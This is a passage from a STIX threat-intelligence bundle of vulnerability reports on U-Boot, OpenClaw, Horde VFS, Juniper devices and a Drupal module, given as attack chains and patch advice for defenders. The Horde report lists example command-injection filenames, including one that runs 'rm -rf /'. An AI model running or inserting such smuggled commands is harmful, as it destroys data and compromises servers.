        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58276"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58278"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58285"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58286"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58289"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58293"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58294"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58298"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58300"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58291"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57975"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57983"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57984"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57991"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58284"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58287"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58288"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58290"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58292"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58295"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58296"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58297"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58299"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_dns_tunneling_nslookup.toml"
        },
        {
          "source_name": "reference",
          "url": "https://securelist.com/microsoft-device-code-phishing-attack/120350/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/create_remote_thread_in_shell_application.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/create_remote_thread_into_lsass.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_remote_thread_to_known_windows_process.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_uncommon_remote_thread_creation_in_browser_process.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_untrusted_driver_loaded.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/initial_access_entra_id_oauth_device_code_phishing_tycoon_aitm.toml"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55952"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54886"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/initial_access_entra_id_signin_impossible_travel.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/persistence_entra_id_multiple_device_registrations.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/initial_access_entra_id_unusual_legacy_auth_client_signin.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/initial_access_entra_id_unusual_ropc_login_attempt.toml"
        },
        {
          "source_name": "reference",
          "url": "https://cloud.google.com/blog/topics/threat-intelligence/recovering-active-adfs-signing-keys-machine-dpapi/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/persistence_entra_id_device_registration_to_prt_chain.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/persistence_entra_id_phishing_kit_default_os_build_device_registration.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/entityanalytics_entra_id/persistence_entra_id_device_phishing_kit_default_os_build.toml"
        },
        {
          "source_name": "reference",
          "url": "https://www.reddit.com/r/blueteamsec/comments/1uqiaj4/recovering_active_adfs_signing_keys_via_machine/"
        },
        {
          "source_name": "reference",
          "url": "https://www.darkreading.com/cyberattacks-data-breaches/vidar-infostealer-smb-malvertising-campaign"
        },
        {
          "source_name": "reference",
          "url": "https://www.darkreading.com/cyberattacks-data-breaches/goddamn-ransomware-byovd-smite-companies"
        },
        {
          "source_name": "reference",
          "url": "https://any.run/cybersecurity-blog/usa-top-30-threats-2026/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0854/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0855/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25878ac3-a0cc-5185-84af-93bd83981ef2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5d811e56-dc03-5c4f-a5c4-b9aab0a79e72",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5d811e56-dc03-5c4f-a5c4-b9aab0a79e72",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-29008: U-Boot Integer Underflow Leads to Bootloader Crash",
      "description": "## Overview\n\nU-Boot versions up to and including 2026.04-rc3 are susceptible to an integer underflow vulnerability (CVE-2026-29008) within the `tcp_rx_state_machine()` function, located in `net/tcp.c`. This flaw enables a network-adjacent attacker to trigger a bootloader crash, thereby preventing the device from booting. The attack involves sending a specially crafted TCP SYN+ACK packet where the data offset field is manipulated. This manipulation causes the `payload_len` variable to become negative. Subsequently, this negative value is implicitly converted into a large unsigned integer when passed to `memcpy()` within the `store_block()` function, leading to an excessive memory copy operation and an immediate system crash. If `CONFIG_LMB` is disabled, this could also result in memory corruption. This vulnerability poses a significant denial-of-service risk for embedded systems utilizing affected U-Boot versions.\n\n## Attack Chain\n\n1. Attacker gains network adjacency to a vulnerable device running U-Boot.\n2. The attacker crafts a malicious TCP SYN+ACK packet.\n3. The data offset field within the crafted TCP SYN+ACK packet is manipulated to an invalid value.\n4. The vulnerable U-Boot bootloader receives the malformed TCP SYN+ACK packet in its `tcp_rx_state_machine()` function.\n5. During processing, the manipulated data offset causes the `payload_len` variable to become a negative integer.\n6. The `TCP_SYN_SENT` handler calls `tcp_rx_user_data()` without proper `tcp_seg_in_wnd()` validation for the malformed packet.\n7. The negative `payload_len` is implicitly converted to a very large unsigned integer, which is then passed to `memcpy()` in `store_block()`.\n8. The `memcpy()` operation attempts to copy an excessively large amount of data, resulting in an immediate bootloader crash and device failure to boot, with potential memory corruption if `CONFIG_LMB` is disabled.\n\n## Impact\n\nThe successful exploitation of CVE-2026-29008 leads to a denial of service (DoS) by causing the affected U-Boot bootloader to crash. This prevents the device from successfully booting, rendering it inoperable until manual intervention or a power cycle. The vulnerability has a CVSS v3.1 base score of 7.5, indicating a high severity. Furthermore, if the `CONFIG_LMB` option is disabled, the arbitrary large `memcpy()` operation could result in memory corruption, potentially leading to further compromise beyond a mere crash, though direct code execution is not explicitly detailed. This impacts embedded devices and systems that rely on U-Boot for their boot process.\n\n## Recommendation\n\n* Immediately patch U-Boot to a version beyond 2026.04-rc3 to remediate CVE-2026-29008.\n* Implement network intrusion detection/prevention systems (IDS/IPS) to block malformed TCP SYN+ACK packets, particularly those with anomalous data offset values associated with CVE-2026-29008 exploitation attempts.\n* Review network firewall rules to ensure only legitimate and properly formed network traffic reaches critical embedded devices running U-Boot.\n",
      "published": "2026-07-08T17:18:19Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "bootloader",
        "network",
        "embedded-systems"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29008"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--de4b1afc-82e1-5f63-be0c-c2ca476cd079",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-29009 - U-Boot Buffer Overflow in nfs_readlink_reply()",
      "description": "## Overview\n\nU-Boot through 2026.04-rc3 contains a severe buffer overflow vulnerability (CVE-2026-29009) residing within the `nfs_readlink_reply()` function in `net/nfs-common.c`. This flaw is exploitable when `CONFIG_CMD_NFS` is enabled, a common configuration for devices that boot over a network. A malicious or compromised NFS server can exploit this by crafting a sequence of two or more READLINK responses. Each response must contain a relative symlink target approximately 1100 bytes long. When these are appended by the vulnerable U-Boot client without proper cumulative length validation, the 2048-byte `nfs_path_buff` buffer overflows. This leads to the corruption of adjacent BSS variables, including critical network configuration data like `nfs_server_ip`, `nfs_server_mount_port`, `nfs_server_port`, `nfs_our_port`, `nfs_state`, and `rpc_id`. The consequence is memory corruption and the potential for an attacker to gain control over the U-Boot NFS client's state machine, enabling further compromise of the embedded device or system.\n\n## Attack Chain\n\n1. An attacker compromises or gains control of an NFS server.\n2. A vulnerable U-Boot client, with `CONFIG_CMD_NFS` enabled, attempts to perform an NFS operation (e.g., read a symlink) from the attacker-controlled NFS server during its boot process.\n3. The attacker's NFS server sends the first READLINK response to the U-Boot client. This response contains a crafted relative symlink target of approximately 1100 bytes.\n4. The U-Boot client's `nfs_readlink_reply()` function processes this response and appends the symlink target to its internal `nfs_path_buff` buffer, which has a capacity of 2048 bytes.\n5. The attacker's NFS server then sends a second READLINK response, also containing a relative symlink target of approximately 1100 bytes.\n6. The `nfs_readlink_reply()` function attempts to append this second symlink target to `nfs_path_buff` without validating the cumulative length of the appended data.\n7. This second append causes the `nfs_path_buff` buffer to overflow, corrupting adjacent BSS variables in memory, such as `nfs_server_ip`, `nfs_state`, and `rpc_id`.\n8. The memory corruption provides the attacker with potential control over the U-Boot NFS client's state machine, allowing for manipulation of the boot process or further arbitrary actions.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-29009 can lead to severe memory corruption within the U-Boot environment. Attackers can corrupt critical BSS variables, including network configuration parameters and the internal state of the NFS client. This grants the attacker control over the U-Boot NFS client state machine, potentially allowing them to manipulate the boot process, redirect network traffic, or execute arbitrary code during the initial boot stages. While no specific victim counts or industry sectors are identified in the disclosure, any embedded system or device utilizing U-Boot with NFS boot capabilities enabled is at risk, potentially leading to full device compromise before the main operating system even loads.\n\n## Recommendation\n\n* Patch CVE-2026-29009 on all affected U-Boot installations immediately.\n* Review and disable the `CONFIG_CMD_NFS` option in U-Boot builds if NFS boot functionality is not strictly required.\n",
      "published": "2026-07-08T17:19:10Z",
      "labels": [
        "buffer-overflow",
        "vulnerability",
        "firmware",
        "nfs",
        "u-boot"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29009"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--868bdc29-d1f3-53f7-a82e-d451ad65d719",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1edfef62-5bae-5dd0-90d5-85a498b6b279",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1edfef62-5bae-5dd0-90d5-85a498b6b279",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59261 - OpenClaw Credential Exposure via Workspace Dotenv Files",
      "description": "## Overview\n\nA significant credential exposure vulnerability, identified as CVE-2026-59261, has been discovered in OpenClaw versions prior to 2026.5.28. This flaw allows malicious actors who have already gained lower-trust access to specific, configured input paths within an OpenClaw environment to exploit the system. The vulnerability stems from OpenClaw's design, where workspace dotenv files can inadvertently override provider credentials. By manipulating or introducing these `.env` files in designated input locations, attackers can expose sensitive data and credentials that are intended to remain within trusted security boundaries. This issue poses a substantial risk of unauthorized access to various integrated services and data managed by OpenClaw deployments, impacting the integrity and confidentiality of sensitive information.\n\n## Impact\n\nThe successful exploitation of CVE-2026-59261 can lead to the exposure of highly sensitive credentials and data. Attackers gaining lower-trust access to configured input paths could leverage this vulnerability to exfiltrate or misuse authentication tokens, API keys, database credentials, or other secrets stored within OpenClaw's operational environment. This could result in unauthorized access to connected systems, data breaches, or further lateral movement within an affected organization's infrastructure. While no specific victim count or targeted sectors are mentioned in the advisory, any organization utilizing vulnerable OpenClaw versions is at risk of significant data compromise and operational disruption.\n\n## Recommendation\n\n* Immediately patch all OpenClaw installations to version 2026.5.28 or later to address CVE-2026-59261.\n* Conduct a comprehensive audit of configured input paths within your OpenClaw environments to ensure only trusted users and processes have appropriate access.\n* Review existing workspace dotenv files for any potentially sensitive information and implement strict access controls to prevent unauthorized modification or creation of such files.\n",
      "published": "2026-07-08T17:19:57Z",
      "labels": [
        "credential-exposure",
        "vulnerability",
        "openclaw",
        "configuration-error"
      ],
      "object_refs": [
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59261"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4pqj-3c56-5fqq"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/openclaw-credential-override-via-workspace-dotenv-files"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--88e530ac-5581-5991-88e3-1656c7ae8fd4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a21ab4f9-9d5f-5aa1-9fb6-9be9ba0bcfc6",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a21ab4f9-9d5f-5aa1-9fb6-9be9ba0bcfc6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-60102: Horde VFS OS Command Injection Vulnerability",
      "description": "## Overview\n\nA critical OS command injection vulnerability, tracked as CVE-2026-60102, has been identified in the Horde Virtual File System (VFS) API, affecting versions prior to 3.0.1. This flaw resides within the Horde_Vfs_Smb driver's `_escapeShellCommand()` method, which fails to properly sanitize command substitution sequences. Authenticated attackers can exploit this by crafting malicious filenames containing unescaped shell commands and performing standard file operations such as upload, folder creation, rename, or deletion. These malicious filenames are then interpolated into a double-quoted shell context and executed via `proc_open()` through `/bin/sh -c` before the `smbclient` utility runs. Successful exploitation results in arbitrary command execution on the server hosting the Horde VFS, granting attackers significant control over the compromised system. This vulnerability poses a severe risk to organizations using affected Horde VFS installations, as it allows for unauthorized code execution and potential data compromise.\n\n## Attack Chain\n\n1. **Initial Access**: An attacker gains authenticated access to a vulnerable Horde Virtual File System (VFS) API instance using legitimate or compromised credentials.\n2. **Craft Malicious Input**: The attacker prepares a filename that includes OS command substitution sequences (e.g., `$(id)`, `| ls -la`, `file.php;rm -rf /`).\n3. **Trigger File Operation**: The attacker initiates a file operation, such as uploading a file, creating a folder, renaming a file/folder, or deleting a file/folder, providing the malicious filename.\n4. **Vulnerable Code Execution**: The Horde_Vfs_Smb driver processes the request, and the `_escapeShellCommand()` method is called to sanitize the filename before passing it to an underlying system command.\n5. **Failed Sanitization**: Due to the vulnerability, `_escapeShellCommand()` fails to properly sanitize the command substitution sequences within the attacker-controlled filename.\n6. **Command Injection**: The unsanitized malicious filename is interpolated into a double-quoted shell context that is passed to `proc_open()`.\n7. **Arbitrary Command Execution**: The `/bin/sh -c` command interpreter executes the injected arbitrary shell commands on the underlying system, leading to full compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-60102 allows authenticated attackers to achieve arbitrary command execution on the server hosting the Horde VFS API. This means attackers can execute any command with the privileges of the web server process, potentially leading to full system compromise, data exfiltration, installation of backdoors, defacement of web content, or further network lateral movement. For organizations relying on Horde VFS for document management or collaboration, this vulnerability can result in significant operational disruption, data breaches, and reputational damage. The NVD rates this with a CVSS v3.1 Base Score of 8.8, indicating high severity.\n\n## Recommendation\n\n* Immediately patch CVE-2026-60102 by upgrading Horde Virtual File System (VFS) API to version 3.0.1 or later on all affected systems.\n* Deploy the Sigma rule below to detect attempts to exploit CVE-2026-60102.\n* Enable comprehensive web server access logging (e.g., Apache, Nginx) to capture `cs-uri-query` and `cs-uri-stem` details for all requests, which can be used by the detection rule.\n* Monitor `proc_open()` calls for unusual shell command execution patterns if your endpoint detection and response (EDR) or system logging provides this visibility.\n",
      "published": "2026-07-08T17:20:42Z",
      "labels": [
        "os-command-injection",
        "rce",
        "webserver",
        "horde",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-60102"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5144d539-e8ac-5e62-8497-218ed5236de3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dbff46b3-e6c6-5db9-a52e-849e3b4290f6",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--924a44ae-e376-5179-aa4a-3e2415b490b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dbff46b3-e6c6-5db9-a52e-849e3b4290f6",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--dbff46b3-e6c6-5db9-a52e-849e3b4290f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Juniper Networks Releases Security Advisories for Multiple Vulnerabilities, Including Heap Buffer Overflow and Memory Leak",
      "description": "## Overview\n\nOn July 8, 2026, Juniper Networks published security advisories to address critical vulnerabilities affecting a wide range of its networking products. The advisories highlight issues in Juniper cRPD, CTPView, Network Director, Junos OS, Junos OS Evolved, Junos OS on MX Series with SPC3 and SRX Series, and Junos Space. Two notable vulnerabilities are CVE-2020-7450, a heap buffer overflow in the `libfetch` component of Junos OS Evolved, and CVE-2026-33799, a memory leak in the `snmpd` daemon affecting both Junos OS and Junos OS Evolved. These flaws could be exploited by remote attackers, potentially leading to arbitrary code execution or denial of service on affected devices. Organizations using Juniper products are strongly urged to review the advisories and apply the necessary updates to mitigate these risks.\n\n## Attack Chain\n\n1. Attacker performs reconnaissance to identify internet-facing Juniper Networks devices running vulnerable versions of Junos OS or Junos OS Evolved.\n2. **For CVE-2020-7450 (Junos OS Evolved):** The attacker crafts and sends a malicious HTTP/HTTPS request containing a specially malformed URL to the target device.\n3. The vulnerable `libfetch` component within Junos OS Evolved attempts to parse the malformed URL, triggering a heap buffer overflow condition.\n4. This heap buffer overflow can be exploited by the attacker to achieve arbitrary code execution on the device, potentially leading to full system compromise.\n5. **For CVE-2026-33799 (Junos OS/Evolved):** The attacker crafts and sends a specific, malformed SNMPv3 request to the vulnerable Juniper device.\n6. The `snmpd` daemon on the device processes the crafted SNMPv3 request, which results in a memory leak within the daemon's allocated memory space.\n7. The attacker continuously sends repeated crafted SNMPv3 requests, causing further memory leaks and gradually depleting the `snmpd` daemon's resources.\n8. Eventually, the persistent memory exhaustion causes the `snmpd` daemon to crash, leading to a Denial of Service for SNMP services on the affected Juniper device.\n\n## Impact\n\nThe identified vulnerabilities pose significant risks to network infrastructure. Exploitation of CVE-2020-7450, a heap buffer overflow, could allow an unauthenticated attacker to achieve arbitrary code execution on Junos OS Evolved devices. This would grant the attacker full control over the device, enabling data exfiltration, network segmentation bypass, or further compromise of the internal network. CVE-2026-33799, a memory leak, can lead to a denial of service for SNMP services on both Junos OS and Junos OS Evolved. While not directly leading to system compromise, a crashed SNMP daemon can disrupt network monitoring, management, and potentially impact other critical services reliant on SNMP, leading to operational downtime and reduced visibility into network health.\n\n## Recommendation\n\n* Immediately apply the recommended updates and patches provided by Juniper Networks for all affected products as detailed in the Juniper Networks security advisories linked in this brief.\n* Ensure that internet-facing Junos OS Evolved devices are patched against CVE-2020-7450 to prevent potential arbitrary code execution.\n* Verify that Junos OS and Junos OS Evolved devices are updated to mitigate CVE-2026-33799 and prevent SNMP service denial of service.\n* Review the specific security bulletins (e.g., \"2026-07 Security Bulletin: CTPView: Multiple vulnerabilities resolved in 9.3R2-3 Release\", \"2026-07 Security Bulletin: Junos Space: Multiple vulnerabilities resolved in 26.1R1 Patch V1 Release\") for precise version requirements and update paths.\n",
      "published": "2026-07-08T18:01:34Z",
      "labels": [
        "vulnerability",
        "network-device",
        "juniper",
        "patch-management"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://cyber.gc.ca/en/alerts-advisories/juniper-networks-security-advisory-av26-675"
        },
        {
          "source_name": "reference",
          "url": "https://supportportal.juniper.net/s/article/2026-07-Security-Bulletin-CTPView-Multiple-vulnerabilities-resolved-in-9-3R2-3-Release"
        },
        {
          "source_name": "reference",
          "url": "https://supportportal.juniper.net/s/article/2026-07-Security-Bulletin-Junos-Space-Multiple-vulnerabilities-resolved-in-26-1R1-Patch-V1-Release"
        },
        {
          "source_name": "reference",
          "url": "https://supportportal.juniper.net/s/article/2026-07-Security-Bulletin-Junos-OS-Evolved-URL-handling-vulnerability-in-libfetch-results-in-heap-buffer-overflow-CVE-2020-7450"
        },
        {
          "source_name": "reference",
          "url": "https://supportportal.juniper.net/s/article/2026-07-Security-Bulletin-Junos-OS-and-Junos-OS-Evolved-Receipt-of-a-specific-SNMPv3-request-results-in-memory-leak-and-eventual-snmpd-crash-CVE-2026-33799"
        },
        {
          "source_name": "reference",
          "url": "https://supportportal.juniper.net/s/global-search/%40uri#f-sf_primarysourcename=Knowledge"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2083faf0-7682-59f5-b8d2-bd9a045de3ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de261251-2d08-5ed4-8945-9a1a00c47ea6",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--248a45fe-85b1-5e66-b529-b7daeeea76b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de261251-2d08-5ed4-8945-9a1a00c47ea6",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c570d342-4e1f-550d-821b-7cc2cc1b3c70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de261251-2d08-5ed4-8945-9a1a00c47ea6",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--de261251-2d08-5ed4-8945-9a1a00c47ea6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical SQL Injection Vulnerability in Drupal Location Selector Module (SA-CONTRIB-2026-072)",
      "description": "## Overview\n\nOn July 8, 2026, the Canadian Centre for Cyber Security (CCCS) published an advisory (AV26-676) warning of a critical SQL Injection vulnerability (SA-CONTRIB-2026-072) affecting Drupal's Location Selector module, specifically versions prior to 1.3.0. This vulnerability allows an unauthenticated attacker to execute arbitrary SQL commands against the backend database, potentially leading to unauthorized data access, modification, or deletion. The critical nature of this flaw necessitates immediate attention from defenders, as successful exploitation could compromise the integrity and confidentiality of data stored on affected Drupal sites. Organizations utilizing the Location Selector module are strongly advised to apply the security updates promptly to prevent potential exploitation. This advisory highlights the ongoing risk posed by web application vulnerabilities and the importance of timely patching.\n\n## Attack Chain\n\n1. Attacker identifies an internet-facing Drupal instance running the vulnerable Location Selector module (versions prior to 1.3.0).\n2. Attacker crafts a specially malformed HTTP request, embedding an SQL injection payload within a vulnerable parameter exposed by the module.\n3. The Drupal web server processes the malicious request, passing the untrusted input to the application's backend database query.\n4. The embedded SQL payload is executed by the database, allowing 